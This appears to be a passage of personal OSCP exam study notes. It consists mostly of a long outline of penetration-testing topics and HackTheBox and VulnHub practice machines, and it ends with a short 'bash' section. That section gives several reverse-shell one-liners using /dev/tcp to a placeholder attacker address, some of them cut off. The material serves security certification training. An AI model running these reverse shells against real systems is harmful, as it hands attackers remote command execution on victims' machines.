Index

My OSCP Preparation Notes

  1. Scanning
    1. Recon
      1. network
      2. web
        1. gobuster
        2. wfuzz
        3. webdav
        4. jenkins
    2. Nmap
      1. My way
        1. TCP
          1. Step1-Live host
          2. Step2-nmap Full port scan
          3. Step3-Run nmap Full port scan
          4. Step4-nmap Open port scan
          5. Step5-Run Open port scan
        2. UDP
          1. Step2-nmap Full port scan
          2. Step3-Run nmap Full port scan
          3. Step4-nmap Open port scan
          4. Step5-Run Open port scan
        3. FinalScanPart1
        4. FinalScanPart2
    3. Port Knock
  2. Enumeration
    1. HTTP
      1. Gobuster
      2. Nikto
      3. dirsearch
      4. WFuzz
        1. wfuzz username
      5. Command Injection
      6. Login Bypass
      7. Drupal Scan
      8. SSRF
      9. Hydra post form
      10. cewl
    2. FTP-21
      1. Download file from ftp
      2. Autobind ftp when ftp is permission denied for local user
      3. Remember while uploading file on ftp
    3. SSH
      1. SSH Tunneling / Pivoting
      2. enum_ssh
      3. rbash shell escaping
      4. Login with RSA
      5. Decrypt RSA
      6. When bruteforcing hydra don't work
      7. lshell bypass
      8. different shell and their errors
      9. port knocking
    4. SMB
      1. Check smb version
    5. SNMP
      1. snmp_enum
      2. onesixtyone scanning for ips
    6. MS SQL
      1. Microsoft_sql_enum
      2. Error based SQL
      3. boolean based
      4. Time based SQLi
      5. SQL Injection (SQL MAP)
      6. Blind sql
    7. finger_enum_user.sh
      1. Enum Image
    8. Telnet
    9. Pop3
    10. CMS
    11. Uncommon Port Exploitation search/Enum
    12. Steg extract
    13. RDP
    14. James 4555
    15. MDB tool
    16. OS
      1. linux
        1. commands
        2. tty
        3. basic enumeration
        4. suid
        5. cron
        6. grep
      2. windows
        1. basic commands
        2. samba version
        3. search
        4. version
  3. Shell
    1. msfvenom
      1. msf
    2. windows
    3. shell
    4. one liner
      1. php
      2. one liner
      3. infosec one liner
    5. powershell
    6. MSFVenom & Metasploit
      1. MSFVenom-payload
        1. Windows
        2. Linux
        3. Web Payload
        4. Binaries
      2. Metasploit
        1. meterpreter
        2. Meterpreter shell code
        3. MsfVenom Handler
      3. Netcat on windows
  4. Interactive shell
    1. Pseudo shell
      1. python
      2. bash
      3. awk
      4. perl
      5. ruby
      6. lua
      7. IRB
      8. tcpdump
      9. vi
      10. nmap
    2. Full interactive shell
      1. Magic on netcat
    3. Reverse shell
      1. bash
      2. python
      3. ruby
      4. Java
      5. Telnet
      6. netcat
      7. PHP
      8. Gawk
      9. URL reverseshell
      10. bypass & os command php
      11. curl
    4. Reverse Shell with Powercat
  5. File Transfer
    1. tftp
    2. http
    3. linux
    4. windows
    5. scp
    6. Transfer
      1. Windows
        1. Powershell
        2. Cert Util
        3. TFTP
        4. SCP
        5. netcat
        6. Debug
        7. bitsadmin
        8. smb
        9. rdp
      2. Linux
        1. FTP
        2. TFTP
        3. SCP
        4. netcat
        5. curl
        6. Wget
        7. With no tool
  6. WINDOWS - Privilege Escalation
    1. WINDOWS - SharpUp Results
    2. WINDOWS - Kernel
    3. WINDOWS - Services (Binpath)
    4. WINDOWS - Services (Unquoted path)
    5. WINDOWS - Services (Registry)
    6. WINDOWS - Registry (Autorun)
    7. WINDOWS - Registry (AlwaysInstallElevated)
    8. WINDOWS - PasswordMining (Memory)
    9. WINDOWS - Password (Registry)
    10. WINDOWS - Password (config files)
    11. WINDOWS - Scheduled task (Missing binary)
    12. WINDOWS - Startup Application
    13. WINDOWS - Passthehash
    14. WINDOWS - Unquoted Path Service
      1. adding new user
      2. rdp and stickykeys
    15. WINDOWS - (AlwaysInstallElevated)
      1. 1st method - msfvenom
      2. 2nd method - administrator
      3. 3rd way via msf
    16. WINDOWS - Automated Script
      1. Windows-Exploit-suggester
      2. Windows Gather Applied Patches
      3. Sherlock
      4. JAWS – Just Another Windows (Enum) Script
      5. powerup
    17. My Priv esc tech (Windows)
      1. mimikatz if discover protected SID files
      2. Login with obtained creds with psexec and powershell & smbclient
      3. Finding permission & actual file path of shortcut file or .lnk file
      4. icacls & cacls for find file & folder permissions and Edit permission
      5. Discovered VM on target location
      6. Discovered .mdb backup
      7. Discovered .kdbx Keepass database
      8. search file recursively
      9. List hidden files
      10. Got .dmp file extract with volatility
      11. group.xml file with encoded password
      12. Get that "pass" out of the ADS backup.zip
      13. disable firewall enable rdp
      14. Finding windows version from a file
      15. got SAM System file use pwdump to dump hashes
      16. Windows
        1. Ebowla + Token Impersonation
        2. Non interactive powershell file execution
        3. add user
        4. Convert Python2exe
        5. Manual Priv Check
        6. audit priv
  7. LINUX - Privilege Escalation
    1. LINUX - /etc/passwd -deeply
      1. openssl
      2. python
      3. perl
      4. mkpasswd
      5. php
    2. LINUX - Sudo -deeply
      1. Traditional Method to assign Root Privilege
      2. Default Method to assign Root Privilege
      3. find - Allow Root Privilege to Binary commands
      4. Allow Root Privilege to Binary Programs - Spawn shell
        1. perl
        2. python
        3. less
        4. awk - spawn
        5. man
        6. vi
        7. Allow Root Privilege to Shell Script
        8. bash script - spawn
        9. python script - spawn
        10. c script - spawn
        11. Allow Sudo Right to other Programs
        12. Env
        13. ftp
        14. socat
        15. scp
    3. LINUX - SUID - NMAP
    4. LINUX - LD_Preload
    5. LINUX - SUID - vim-tiny
    6. LINUX - writable
      1. cron
    7. LINUX - CRON
      1. cron
    8. LINUX - Automated Script
      1. linenum
      2. Linuxprivchecker
      3. linuxexploitsuggester2
      4. Bashark
      5. beroot
    9. LINUX - capabilities capability
      1. capability
    10. LINUX - Binaries for escalation
      1. zip
      2. wget
        1. passwd entry
      3. wget -2
      4. cat
      5. time
      6. Taskset
      7. git
      8. cp
      9. tmux
      10. tmux -2
      11. ed
      12. sed
      13. pip
      14. lxd
      15. socat
      16. scp
      17. capabilities
      18. perl
      19. docker
      20. perl -2
      21. tmp.py
      22. vi
      23. systemctl
      24. tar
      25. id-disk
      26. id-games
      27. python
      28. crontab
      29. tcpdump
      30. strace
      31. ssh
      32. make
      33. wine
      34. ftp
      35. micro
      36. mysql
      37. Simon
      38. tcpdump
      39. ht
      40. sls
      41. apt-get
      42. ed
      43. mawk
    11. LINUX - Exploiting SUDO CVE-2019-14287
  8. Buffer Overflow
    1. Minishare - Exploitation
    2. Brain Pan - Exploitation
  9. bruteforce
    1. ssh
    2. rdp
    3. ftp
    4. hashcat
    5. gpp-decrypt
    6. wp
    7. john
    8. hydra
    9. cewl and crunch
    10. medusa
    11. ncrack
    12. wfuzz
    13. fcrackzip
    14. keepass
    15. password Cracking
      1. zip
      2. NTLM
      3. /etc/shadow
      4. kbd keepass
      5. RSA Decrypting
      6. SHA512 $6$ shadow file
      7. MD5 $1$ shadow file
      8. john RAW MD5
      9. MD5 Apache webdav file $arp1$
      10. SHA1
      11. Auth Proxy
      12. WordPress (PHPASS) windows
      13. Crack MD5 windows
      14. $5$
      15. $krb5tgs$23$ Kerberos 5 hash
  10. compiling
  11. Tunneling
  12. Imp Tools

OSCP Practice (HTB & Vulnhub)

  1. HTB - linux
    1. tartarsauce
    2. nineveh
    3. haircut
    4. sunday
    5. poison
    6. swagshop
  2. HTB - windows
    1. legacy
    2. devel
    3. bastard
    4. optimum
    5. granny
    6. jeeves -juicypotato
    7. chatterbox
  3. HTB - ippsec windows
    1. access
    2. active
    3. Arctic
    4. arkham
    5. bastard
    6. bastion
    7. blue
    8. bounty
    9. brainfuck
    10. chatterbox
    11. devel
    12. granny
    13. grandpa
    14. jeeves
    15. node
    16. kotarak
    17. lame
    18. legacy
    19. mantis
    20. netmon
    21. optimum
    22. querier
    23. secnotes
    24. oracle
  4. HTB - ippsec linux
    1. Ariekei - docker
    2. Aragog - xxe
    3. Apocalyst - wp
    4. bank
    5. bart
    6. bashed
    7. beep
    8. bitlab
    9. blocky
    10. canape - db
    11. carrier
    12. chaos
    13. charon
    14. crimestoppers
    15. cronos
    16. curling
    17. dab - wfuzz
    18. DevOops
    19. Dropzone
    20. enterprise
    21. europa
    22. falafel
    23. flujab
    24. FluxCapacitor
    25. fortune - nfs
    26. FriendZone
    27. frolic - play
    28. haircut
    29. hawk
    30. haystack
    31. heist
    32. help
    33. irked
    34. jarvis
    35. lazy
    36. luke
    37. networked
    38. nibble
    39. nineveh
    40. zipper
    41. october
    42. onetwoseven
    43. oz
    44. poison
    45. popcorn
    46. sense
    47. shocker
    48. sneaky
    49. solidstate
    50. Stratosphere
    51. sunday
    52. swagshop
    53. tenten
    54. valentine
    55. waldo
    56. wall
    57. zetta
    58. teacher
    59. tartarsauce
    60. postman
  5. htbwithout msf - ranakhalil
    1. Bashed (linux)
    2. Devel (windows)
    3. Lame (linux)
    4. legacy (windows)
    5. Optimum (windows)
    6. Arctic (Windows)
    7. Shocker (linux)
    8. Valentine (linux)
    9. nibble (linux)
    10. cronos (linux)
    11. Blue (windows)
    12. Irked (linux)
    13. Friendzone (linux)
    14. brainfuck (linux)
    15. beep (linux)
    16. nineveh (linux)
    17. Active (Windows)
    18. sense (freebsd)
    19. solidstate (linux)
    20. node (linux)
    21. Poison (freebsd)
    22. Sunday (solaris)
    23. Swagshop (linux)
    24. Jarvis (linux)
    25. Networked (linux)
    26. TartarSauce (linux)
    27. LaCasaDePapel (linux)
    28. Hawk (linux) - drupal
    29. lightweight (linux)
    30. Devoops (linux)
    31. falafel (linux)
    32. kotarak (linux)
    33. bastard (windows)
    34. granny (windows)
    35. grandpa (windows)
    36. bounty (windows) gobuster - webconfig -juicy
    37. jerry (windows)
    38. chatterbox (windows)
    39. Silo (windows)
    40. Conceal (Windows)
    41. Netmon (windows)
    42. jeeves (windows) jenkins
    43. bart (windows)
    44. tally (windows)
    45. jail
    46. safe
    47. bankrobber
  6. Vulnhub
    1. Bsides Vancouver
    2. raven 1
    3. raven 2
    4. acid 1
    5. violator
    6. troll 3
    7. pinkypalace v2
    8. pinkypalace v1
    9. digital world
      1. joy
      2. bravery
      3. mercy
      4. development
      5. torment
    10. skytower
    11. IMF
    12. troll1
    13. troll 2
    14. /dev/random sleepy
    15. BILLY MADISON
    16. wallabys-nightmare
    17. solidstate- james
    18. web developer - wp
    19. zico 1
    20. lin.security
    21. lord of the root - mysql udf
    22. pwnos 2.0
    23. sickos
    24. vulnos 2
    25. Mr. Robot 1
    26. stapler
    27. firstileaks
    28. kioptrix 2014
    29. kioptrix 1.3
    30. kioptrix 1.2
    31. kioptrix 1.1
    32. kioptrix 1
    33. metasploitable 3
    34. metasploitable 2
    35. metasploitable 1
  7. Vulnhub2
    1. sunset desk
    2. me and my gf 1
    3. sunset sunrise
    4. UA Literally vulnerable
    5. in plain sight 1
    6. HA: Dhanush
    7. HA: Chanakya
    8. djinn
    9. Jigsaw
    10. evm1
    11. mumbai 1
    12. gears-of-war-ep1
    13. chakravyuh
    14. ha-avengers-arsenal
    15. ha-naruto
    16. joker - joomla
    17. isro
    18. hackerfest
    19. bossplayersctf
    20. Misdirection
    21. armour
    22. ha-wordy- wordpress
    23. dc8
    24. silky
    25. sunset dawn
    26. sunset dawn
    27. Prime
    28. teuchter
    29. violator
    30. symfonos4
    31. dc-7 - drupal
    32. ai web 2
    33. hack 6 day
    34. digitalworld-localtorment
    35. hack-the-gemini-inc2
    36. dev-random-k2-vm-boot2root
    37. hack the gemini
    38. ai web 1
    39. hack-the-lin-security - mast
    40. oracle padding
    41. nezuko-1-vulnhub
    42. minu-v2
    43. digitalworld-local-joy
    44. symfonos2
    45. Matrix-3
    46. pumpkinraising
    47. symfonos1
    48. W1R3S.inc VM
    49. hack the de ice
    50. hack-kevgir
    51. vulnos-1
    52. dexter
    53. pwnlab
    54. sputnik-1 splunk
    55. dc1

bash

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/x.x.x.x


exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done



bash -i >& /dev/tcp/x.x.x.x